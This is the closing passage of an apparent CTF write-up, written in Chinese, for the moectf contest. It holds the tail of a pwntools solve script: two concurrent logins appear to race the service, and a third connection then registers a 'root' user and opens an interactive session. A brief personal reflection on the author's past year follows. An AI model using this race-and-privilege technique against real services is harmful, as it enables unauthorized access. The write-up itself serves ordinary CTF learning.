io2.recvuntil(b'Please select your operation:')
io1.recvuntil(b'Please select your operation:')
io1.sendline(b'3')
io2.sendline(b'3')
io1.recvuntil(b'username:')
io2.recvuntil(b'username:')
io2.sendline(b'r3t2')
io1.sendline(b'r3t2')
io1.recvuntil(b'password')
io2.recvuntil(b'password')
io1.sendline(b'123')
io2.sendline(b'123')

# 3注册一个root用户
io3.recvuntil(b'Please select your operation:')
io3.sendline(b'1')
io3.recvuntil(b'username:')
io3.sendline(b'root')
io3.recvuntil(b'password')
io3.sendline(b'123')

io3.interactive()

0xff

原来已经一年了，moectf也算是见证了笔者这一年的变化，看到平台还留存着自己的参赛记录
学校的新生赛也刚刚结束，25级的新师傅们很有天赋和潜力，回想起自己去年新生赛的时候什么都不会，却也坚持每天到线下，也算勤能补拙吧哈哈
本人笔拙，写不出富含情感的文字，许多感受也写不太出来，最后就祝WHUCTF/DAWN越来越来好，祝看到最后的师傅们天天向上！
以上